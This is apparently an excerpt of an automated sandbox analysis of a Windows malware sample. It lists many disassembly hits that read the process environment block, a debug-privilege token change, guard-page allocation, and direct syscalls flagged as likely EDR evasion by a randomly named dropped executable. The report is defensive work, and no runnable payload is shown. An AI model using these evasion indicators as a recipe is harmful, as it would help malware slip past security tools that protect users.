Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012906F1 mov eax, dword ptr fs:[00000030h]	4_2_012906F1
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012906F1 mov eax, dword ptr fs:[00000030h]	4_2_012906F1
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0128E6F2
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0128E6F2
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0128E6F2
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0128E6F2
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124A6C7 mov ebx, dword ptr fs:[00000030h]	4_2_0124A6C7
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124A6C7 mov eax, dword ptr fs:[00000030h]	4_2_0124A6C7
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A892B mov eax, dword ptr fs:[00000030h]	4_2_012A892B
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129892A mov eax, dword ptr fs:[00000030h]	4_2_0129892A
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128E908 mov eax, dword ptr fs:[00000030h]	4_2_0128E908
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128E908 mov eax, dword ptr fs:[00000030h]	4_2_0128E908
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01208918 mov eax, dword ptr fs:[00000030h]	4_2_01208918
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01208918 mov eax, dword ptr fs:[00000030h]	4_2_01208918
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129C912 mov eax, dword ptr fs:[00000030h]	4_2_0129C912
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01236962 mov eax, dword ptr fs:[00000030h]	4_2_01236962
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01236962 mov eax, dword ptr fs:[00000030h]	4_2_01236962
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01236962 mov eax, dword ptr fs:[00000030h]	4_2_01236962
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0125096E mov eax, dword ptr fs:[00000030h]	4_2_0125096E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0125096E mov edx, dword ptr fs:[00000030h]	4_2_0125096E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0125096E mov eax, dword ptr fs:[00000030h]	4_2_0125096E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B4978 mov eax, dword ptr fs:[00000030h]	4_2_012B4978
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B4978 mov eax, dword ptr fs:[00000030h]	4_2_012B4978
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129C97C mov eax, dword ptr fs:[00000030h]	4_2_0129C97C
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012E4940 mov eax, dword ptr fs:[00000030h]	4_2_012E4940
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01290946 mov eax, dword ptr fs:[00000030h]	4_2_01290946
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012229A0 mov eax, dword ptr fs:[00000030h]	4_2_012229A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012229A0 mov eax, dword ptr fs:[00000030h]	4_2_012229A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012229A0 mov eax, dword ptr fs:[00000030h]	4_2_012229A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012229A0 mov eax, dword ptr fs:[00000030h]	4_2_012229A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012229A0 mov eax, dword ptr fs:[00000030h]	4_2_012229A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012229A0 mov eax, dword ptr fs:[00000030h]	4_2_012229A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012229A0 mov eax, dword ptr fs:[00000030h]	4_2_012229A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012229A0 mov eax, dword ptr fs:[00000030h]	4_2_012229A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012229A0 mov eax, dword ptr fs:[00000030h]	4_2_012229A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012229A0 mov eax, dword ptr fs:[00000030h]	4_2_012229A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012229A0 mov eax, dword ptr fs:[00000030h]	4_2_012229A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012229A0 mov eax, dword ptr fs:[00000030h]	4_2_012229A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012229A0 mov eax, dword ptr fs:[00000030h]	4_2_012229A0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012109AD mov eax, dword ptr fs:[00000030h]	4_2_012109AD
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012109AD mov eax, dword ptr fs:[00000030h]	4_2_012109AD
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012989B3 mov esi, dword ptr fs:[00000030h]	4_2_012989B3
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012989B3 mov eax, dword ptr fs:[00000030h]	4_2_012989B3
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012989B3 mov eax, dword ptr fs:[00000030h]	4_2_012989B3
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129E9E0 mov eax, dword ptr fs:[00000030h]	4_2_0129E9E0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012429F9 mov eax, dword ptr fs:[00000030h]	4_2_012429F9
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012429F9 mov eax, dword ptr fs:[00000030h]	4_2_012429F9
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A69C0 mov eax, dword ptr fs:[00000030h]	4_2_012A69C0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0121A9D0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0121A9D0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0121A9D0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0121A9D0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0121A9D0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121A9D0 mov eax, dword ptr fs:[00000030h]	4_2_0121A9D0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012449D0 mov eax, dword ptr fs:[00000030h]	4_2_012449D0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012DA9D3 mov eax, dword ptr fs:[00000030h]	4_2_012DA9D3
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B483A mov eax, dword ptr fs:[00000030h]	4_2_012B483A
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B483A mov eax, dword ptr fs:[00000030h]	4_2_012B483A
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124A830 mov eax, dword ptr fs:[00000030h]	4_2_0124A830
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01232835 mov eax, dword ptr fs:[00000030h]	4_2_01232835
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01232835 mov eax, dword ptr fs:[00000030h]	4_2_01232835
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01232835 mov eax, dword ptr fs:[00000030h]	4_2_01232835
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01232835 mov ecx, dword ptr fs:[00000030h]	4_2_01232835
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01232835 mov eax, dword ptr fs:[00000030h]	4_2_01232835
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01232835 mov eax, dword ptr fs:[00000030h]	4_2_01232835
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129C810 mov eax, dword ptr fs:[00000030h]	4_2_0129C810
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A6870 mov eax, dword ptr fs:[00000030h]	4_2_012A6870
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A6870 mov eax, dword ptr fs:[00000030h]	4_2_012A6870
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129E872 mov eax, dword ptr fs:[00000030h]	4_2_0129E872
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129E872 mov eax, dword ptr fs:[00000030h]	4_2_0129E872
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01222840 mov ecx, dword ptr fs:[00000030h]	4_2_01222840
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01240854 mov eax, dword ptr fs:[00000030h]	4_2_01240854
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01214859 mov eax, dword ptr fs:[00000030h]	4_2_01214859
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01214859 mov eax, dword ptr fs:[00000030h]	4_2_01214859
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01210887 mov eax, dword ptr fs:[00000030h]	4_2_01210887
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129C89D mov eax, dword ptr fs:[00000030h]	4_2_0129C89D
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012DA8E4 mov eax, dword ptr fs:[00000030h]	4_2_012DA8E4
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124C8F9 mov eax, dword ptr fs:[00000030h]	4_2_0124C8F9
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124C8F9 mov eax, dword ptr fs:[00000030h]	4_2_0124C8F9
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123E8C0 mov eax, dword ptr fs:[00000030h]	4_2_0123E8C0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012E08C0 mov eax, dword ptr fs:[00000030h]	4_2_012E08C0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123EB20 mov eax, dword ptr fs:[00000030h]	4_2_0123EB20
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123EB20 mov eax, dword ptr fs:[00000030h]	4_2_0123EB20
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012D8B28 mov eax, dword ptr fs:[00000030h]	4_2_012D8B28
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012D8B28 mov eax, dword ptr fs:[00000030h]	4_2_012D8B28
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012E4B00 mov eax, dword ptr fs:[00000030h]	4_2_012E4B00
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128EB1D mov eax, dword ptr fs:[00000030h]	4_2_0128EB1D
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128EB1D mov eax, dword ptr fs:[00000030h]	4_2_0128EB1D
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128EB1D mov eax, dword ptr fs:[00000030h]	4_2_0128EB1D
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128EB1D mov eax, dword ptr fs:[00000030h]	4_2_0128EB1D
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128EB1D mov eax, dword ptr fs:[00000030h]	4_2_0128EB1D
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128EB1D mov eax, dword ptr fs:[00000030h]	4_2_0128EB1D
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128EB1D mov eax, dword ptr fs:[00000030h]	4_2_0128EB1D
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128EB1D mov eax, dword ptr fs:[00000030h]	4_2_0128EB1D
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128EB1D mov eax, dword ptr fs:[00000030h]	4_2_0128EB1D
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120CB7E mov eax, dword ptr fs:[00000030h]	4_2_0120CB7E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C4B4B mov eax, dword ptr fs:[00000030h]	4_2_012C4B4B
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C4B4B mov eax, dword ptr fs:[00000030h]	4_2_012C4B4B
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B8B42 mov eax, dword ptr fs:[00000030h]	4_2_012B8B42
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A6B40 mov eax, dword ptr fs:[00000030h]	4_2_012A6B40
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A6B40 mov eax, dword ptr fs:[00000030h]	4_2_012A6B40
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012DAB40 mov eax, dword ptr fs:[00000030h]	4_2_012DAB40
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012E2B57 mov eax, dword ptr fs:[00000030h]	4_2_012E2B57
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012E2B57 mov eax, dword ptr fs:[00000030h]	4_2_012E2B57
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012E2B57 mov eax, dword ptr fs:[00000030h]	4_2_012E2B57
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012E2B57 mov eax, dword ptr fs:[00000030h]	4_2_012E2B57
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BEB50 mov eax, dword ptr fs:[00000030h]	4_2_012BEB50
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220BBE mov eax, dword ptr fs:[00000030h]	4_2_01220BBE
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220BBE mov eax, dword ptr fs:[00000030h]	4_2_01220BBE
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C4BB0 mov eax, dword ptr fs:[00000030h]	4_2_012C4BB0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012C4BB0 mov eax, dword ptr fs:[00000030h]	4_2_012C4BB0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01218BF0 mov eax, dword ptr fs:[00000030h]	4_2_01218BF0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01218BF0 mov eax, dword ptr fs:[00000030h]	4_2_01218BF0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01218BF0 mov eax, dword ptr fs:[00000030h]	4_2_01218BF0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129CBF0 mov eax, dword ptr fs:[00000030h]	4_2_0129CBF0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123EBFC mov eax, dword ptr fs:[00000030h]	4_2_0123EBFC
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01230BCB mov eax, dword ptr fs:[00000030h]	4_2_01230BCB
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01230BCB mov eax, dword ptr fs:[00000030h]	4_2_01230BCB
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01230BCB mov eax, dword ptr fs:[00000030h]	4_2_01230BCB
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01210BCD mov eax, dword ptr fs:[00000030h]	4_2_01210BCD
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01210BCD mov eax, dword ptr fs:[00000030h]	4_2_01210BCD
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01210BCD mov eax, dword ptr fs:[00000030h]	4_2_01210BCD
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BEBD0 mov eax, dword ptr fs:[00000030h]	4_2_012BEBD0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124CA24 mov eax, dword ptr fs:[00000030h]	4_2_0124CA24
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123EA2E mov eax, dword ptr fs:[00000030h]	4_2_0123EA2E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01234A35 mov eax, dword ptr fs:[00000030h]	4_2_01234A35
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01234A35 mov eax, dword ptr fs:[00000030h]	4_2_01234A35
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124CA38 mov eax, dword ptr fs:[00000030h]	4_2_0124CA38
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129CA11 mov eax, dword ptr fs:[00000030h]	4_2_0129CA11
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124CA6F mov eax, dword ptr fs:[00000030h]	4_2_0124CA6F
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124CA6F mov eax, dword ptr fs:[00000030h]	4_2_0124CA6F
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124CA6F mov eax, dword ptr fs:[00000030h]	4_2_0124CA6F
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BEA60 mov eax, dword ptr fs:[00000030h]	4_2_012BEA60
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128CA72 mov eax, dword ptr fs:[00000030h]	4_2_0128CA72
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128CA72 mov eax, dword ptr fs:[00000030h]	4_2_0128CA72
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01216A50 mov eax, dword ptr fs:[00000030h]	4_2_01216A50
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01216A50 mov eax, dword ptr fs:[00000030h]	4_2_01216A50
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01216A50 mov eax, dword ptr fs:[00000030h]	4_2_01216A50
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01216A50 mov eax, dword ptr fs:[00000030h]	4_2_01216A50
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01216A50 mov eax, dword ptr fs:[00000030h]	4_2_01216A50
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01216A50 mov eax, dword ptr fs:[00000030h]	4_2_01216A50
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01216A50 mov eax, dword ptr fs:[00000030h]	4_2_01216A50
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220A5B mov eax, dword ptr fs:[00000030h]	4_2_01220A5B
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01220A5B mov eax, dword ptr fs:[00000030h]	4_2_01220A5B
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01218AA0 mov eax, dword ptr fs:[00000030h]	4_2_01218AA0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01218AA0 mov eax, dword ptr fs:[00000030h]	4_2_01218AA0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01266AA4 mov eax, dword ptr fs:[00000030h]	4_2_01266AA4
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121EA80 mov eax, dword ptr fs:[00000030h]	4_2_0121EA80
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121EA80 mov eax, dword ptr fs:[00000030h]	4_2_0121EA80
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121EA80 mov eax, dword ptr fs:[00000030h]	4_2_0121EA80
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121EA80 mov eax, dword ptr fs:[00000030h]	4_2_0121EA80
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121EA80 mov eax, dword ptr fs:[00000030h]	4_2_0121EA80
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121EA80 mov eax, dword ptr fs:[00000030h]	4_2_0121EA80
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121EA80 mov eax, dword ptr fs:[00000030h]	4_2_0121EA80
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121EA80 mov eax, dword ptr fs:[00000030h]	4_2_0121EA80
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121EA80 mov eax, dword ptr fs:[00000030h]	4_2_0121EA80
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012E4A80 mov eax, dword ptr fs:[00000030h]	4_2_012E4A80
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01248A90 mov edx, dword ptr fs:[00000030h]	4_2_01248A90
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124AAEE mov eax, dword ptr fs:[00000030h]	4_2_0124AAEE
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124AAEE mov eax, dword ptr fs:[00000030h]	4_2_0124AAEE
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01266ACC mov eax, dword ptr fs:[00000030h]	4_2_01266ACC
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01266ACC mov eax, dword ptr fs:[00000030h]	4_2_01266ACC
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01266ACC mov eax, dword ptr fs:[00000030h]	4_2_01266ACC
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01210AD0 mov eax, dword ptr fs:[00000030h]	4_2_01210AD0

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
